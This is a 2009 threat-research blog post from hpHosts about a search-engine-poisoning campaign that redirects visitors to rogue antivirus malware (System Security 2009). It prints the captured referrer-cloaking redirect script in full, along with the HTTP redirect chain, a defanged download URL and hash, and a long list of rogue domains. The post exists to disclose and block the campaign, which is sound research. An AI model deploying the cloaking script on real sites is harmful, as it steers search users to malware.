Blog for hpHosts, and whatever else I feel like writing about ....

Thursday, 14 May 2009

Google poisoning, IST, rogues and 250+ reasons to avoid 209.44.* ......

Following on from the IST (Internet Service Team) and their blackhat SEO involving Google, we've got yet another example of Google poisoning, this time from Netelligent Hosting Services Inc and going via SteepHost and Layered Tech.

Unlike the previous one, that contained the script directly, this one contains random rubbish on the site itself, but loads a file called script.js;



vURL Online - Dissect - http://test-file-and-windows-defender.mycepi.net
http://vurl.mysteryfcm.co.uk/?url=618085

script.js is pretty much the same as the last one, in that it checks the referer, and ONLY redirects to the malware, if you've come from a search engine result;

*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://test-file-and-windows-defender.mycepi.net/script.js
Server IP: 206.51.236.156 [ hv101.steephost.com ]
hpHosts Status: Listed [ Class: EMD ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 15 May 2009
Time: 01:58:33:58
*****************************************************************
var Ref=document.referrer;

document.write('<form id="go" method=POST action="h' + 't' + 't' + 'p://zod' + 'une.info/' + 'search.php?q=test+file+and+windows+defender'+'&seref='+encodeURIComponent(document.referrer)+'&ref='+encodeURIComponent(document.URL)+'" style=display:none></form>');
document.write('<form id="go2" method=get action="h' + 't' + 't' + 'p://goo' + 'gle.com/'+'" style=display:none></form>);
function pr(sSearch)
{
f = document.getElementById("go");
f.submit();
}
function goog()
{
f = document.getElementById("go2");
f.submit();
}


if (Ref.indexOf('.google.')!=-1 || Ref.indexOf('.msn.')!=-1 || Ref.indexOf('.live.')!=-1 || Ref.indexOf('.yahoo.')!=-1 || Ref.indexOf('.aol.')!=-1 || Ref.indexOf('search')!=-1 || Ref.indexOf('.ask.')!=-1 || Ref.indexOf('.altavista.')!=-1)
{
pr('');
}else
{
goog();
}


If you've NOT come from a search engine result, you're taken directly to Google.com.

vURL Online - Dissect - http://test-file-and-windows-defender.mycepi.net/script.js
http://vurl.mysteryfcm.co.uk/?url=618087

If however, you've come from a search engine such as Google, you're taken instead, via zodune.info (72.232.117.65) to bestwebscantools.com (209.44.126.241);

POST /search.php?q=test+file+and+windows+defender&seref=http%3A%2F%2Fwww.google.co.uk%2Fsearch%3Fq%3Dhphosts%26hl%3Den%26tbs%3Dqdr%3Am%26start%3D110%26sa%3DN&ref=http%3A%2F%2Ftest-file-and-windows-defender.mycepi.net%2F HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-silverlight, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://test-file-and-windows-defender.mycepi.net/
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Avant Browser; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: zodune.info
Content-Length: 0
Connection: Keep-Alive
Pragma: no-cache
Cookie: s=0

HTTP/1.1 302 Found
Date: Fri, 15 May 2009 06:07:17 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7e-p1 PHP/4.4.7 FrontPage/5.0.2.2510
X-Powered-By: PHP/4.4.7
Set-Cookie: s=1; expires=Fri, 15 May 2009 07:07:17 GMT
Location: http://bestwebscantools.com/page.php?id=64
Keep-Alive: timeout=4, max=500
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

GET /page2.php?id=64 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-silverlight, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://test-file-and-windows-defender.mycepi.net/
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Avant Browser; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Connection: Keep-Alive
Pragma: no-cache
Host: bestwebscantools.com

HTTP/1.1 302 Found
Date: Fri, 15 May 2009 01:07:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
location: index.php?c=0&e=0&affid=08064
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html


Where you're presented with the following scare tactics;





Unfortunately, 99% of you have Javascript and ActiveX enabled so you can see those lovely little flash movies, so instead of just seeing a yellow bar mentioning an ActiveX being unable to run, you're going to have the site automagically download it's crap from;

install.exe - MD5: 924393ff9b991829ade66d9fe21bc29f
hxxp://bestwebscantools.com/download.php?affid=08064

Ref:
http://virusscan.jotti.org/en/scanresult/6ec4960b0d568fde522926a3505722e38f60c6ea
http://www.threatexpert.com/report.aspx?md5=924393ff9b991829ade66d9fe21bc29f

This package is 466KB of roguerific goodness called System Security 2009, and is a WinWebSecurity variant. This particular variant, is currently only detected by a-Squared (Trojan.Win32.Winwebsec!IK), Malwarebytes Anti-Malware, BitDefender (Gen:Trojan.Heur.HY.D1827D7D7D) and Ikarus (Trojan.Win32.Winwebsec).

bestwebscantools.com, like all of the rest, shares it's IP address, with a whole host of rogueified goodness, including;

aforirish.com
allowedwebsurfing.com
atom4scan.info
bestwebscantools.com
fan4scan.info
fanscan4.com
freeforscanpc.com
fullsecurityaction.com
fullsecuritydefender.com
fullvirusprotection.com
futureinternetsecurity.com
goareascan.com
goelitescan.com
gofilescan.com
gofixscan.com
gogoalscan.com
gokeyscan.com
gometascan.com
gomorescan.com
gonotescan.com
gorankscan.com
goscanarea.com
goscanelite.com
goscanfan.com
goscanfile.com
goscanfix.com
goscankey.com
goscanmeta.com
goscanmore.com
goscannote.com
goscanrank.com
goscanstar.com
goscantop.com
goscanwork.com
goworkscan.com
greatscansecurity.com
hifor-you.com
hupersecuritydot.com
hypersecurityshield.com
in4ck.com
in4st.com
in4tk.com
individualpeople.biz
individualpeople.org
intellectsecurityshield.com
internetsecuritymetrics.com
key4scan.info
lotante.cn
lotmachinesguide.cn
lotultimatebet.cn
lux4scan.info
mail.websecuritybureau.com
main4scan.info
mainscan4.info
mega4scan.info
mini4scan.info
mix4scan.info
moregreatsites.com
mxnsx.com
ns1.ahuliard.com
ns1.anytoplikedsite.com
ns1.dynamicstabilityexamine.com
ns1.hupersecuritydot.com
ns1.in4ck.com
ns1.in4tk.com
ns1.itsecurityscan.com
ns1.onlinebrandsecuritys.com
ns1.onlinestabilityguide.com
ns1.onlinestabilitysite.com
ns1.onlinestabilityworld.com
ns1.protectionskim.com
ns1.safetyscansite.com
ns1.safewebsecurity.com
ns1.scanstabilityinternet.com
ns1.securityexamination.com
ns1.securityscansite.com
ns1.socialsecurityscan.com
ns1.stabilityaudit.com
ns1.stabilityscanavailable.com
ns1.techsecurityscan.com
ns1.thestabilityweb.com
ns1.webbrowsersecurity.com
ns1.websecuritybureau.com
ns1.wirelesswebglobal.com
ns1.wwwsafeexamine.com
ns2.ahuliard.com
ns2.hupersecuritydot.com
onlinebrandsecuritys.com
onlinepurchasesolution.com
rankscan4.info
ray4scan.info
rayscan4.com
safewebsecurity.com
scan4atom.info
scan4fan.info
scan4lux.info
scan4main.info
scan4mega.info
scan4mini.info
scan4mix.info
scan4rank.info
scan4ray.info
scan4star.info
scan4true.info
scan4user.info
scan4way.info
scan4zoom.info
scan6list.com
scan6slot.com
scanatom4.info
scanfan4.info
scanlux4.info
scanmain4.info
scanmega4.info
scanmini4.info
scanmix4.info
scanray4.info
scanstar4.info
scantrue4.info
scanyourpconline.com
securebillingsoftware.com
securityexamination.com
securitytrustscan.com
socialsecurityscan.com
star4scan.info
systemsecurityonline.com
systemsecuritysite.com
systemsecuritytool.com
system-tuner.net
thefullvirusscan.com
totalvirusshield.com
true4scan.info
truescan4.info
updateyoursecurity.com
userscan4.info
way4scan.info
wayscan4.info
webbrowsersecurity.com
websecuritybureau.com
www.aforirish.com
www.allowedwebsurfing.com
www.atom4scan.info
www.bestwebscantools.com
www.fan4scan.info
www.fanscan4.com
www.freeforscanpc.com
www.fullsecurityaction.com
www.fullsecuritydefender.com
www.fullvirusprotection.com
www.futureinternetsecurity.com
www.goareascan.com
www.goelitescan.com
www.gofilescan.com
www.gofixscan.com
www.gogoalscan.com
www.gokeyscan.com
www.gometascan.com
www.gomorescan.com
www.gonotescan.com
www.gorankscan.com
www.goscanarea.com
www.goscanelite.com
www.goscanfan.com
www.goscanfile.com
www.goscanfix.com
www.goscankey.com
www.goscanmeta.com
www.goscanmore.com
www.goscannote.com
www.goscanrank.com
www.goscanstar.com
www.goscantop.com
www.goscanwork.com
www.goworkscan.com
www.hifor-you.com
www.hupersecuritydot.com
www.hypersecurityshield.com
www.in4ck.com
www.in4st.com
www.in4tk.com
www.individualpeople.biz
www.individualpeople.org
www.intellectsecurityshield.com
www.internetsecuritymetrics.com
www.key4scan.info
www.litegreatestdirect.cn
www.lotante.cn
www.lotultimatebet.cn
www.lux4scan.info
www.main4scan.info
www.mainscan4.info
www.mega4scan.info
www.mini4scan.info
www.mix4scan.info
www.moregreatsites.com
www.mxnsx.com
www.onlinebrandsecuritys.com
www.onlinepurchasesolution.com
www.rankscan4.info
www.ray4scan.com
www.ray4scan.info
www.rayscan4.com
www.safewebsecurity.com
www.scan4atom.info
www.scan4fan.info
www.scan4lux.info
www.scan4main.info
www.scan4mega.info
www.scan4mini.info
www.scan4mix.com
www.scan4mix.info
www.scan4rank.info
www.scan4ray.info
www.scan4star.info
www.scan4true.info
www.scan4user.info
www.scan4way.info
www.scan4zoom.info
www.scan6list.com
www.scan6slot.com
www.scanatom4.info
www.scanfan4.info
www.scanlux4.info
www.scanmain4.info
www.scanmega4.info
www.scanmini4.info
www.scanmix4.info
www.scanray4.info
www.scanstar4.info
www.scantrue4.info
www.scanyourpconline.com
www.securebillingsoftware.com
www.securityexamination.com
www.securitytrustscan.com
www.socialsecurityscan.com
www.star4scan.info
www.systemsecurityonline.com
www.systemsecuritysite.com
www.systemsecuritytool.com
www.system-tuner.net
www.totalvirusshield.com
www.true4scan.info
www.truescan4.info
www.trustedwebsecurity.com
www.updateyoursecurity.com
www.userscan4.info
www.way4scan.info
www.wayscan4.info
www.webbrowsersecurity.com
www.websecuritybureau.com
www.xvirusdescan.com
www.zoomscan4.info
xvirusdescan.com
zoomscan4.info


Sadly, Anubis doesn't seem to be feeling too well at the moment, as it errored out when I tried submitting the file to it, so I submitted it to JoeBox and ThreatExpert instead. The Threat Expert report is referenced above, but JoeBox haven't gotten back to me yet, so I'll post that when it comes through.

In the meantime, feel free to go have a shout at the hosting companies providing the hosting for this rubbish.

No comments: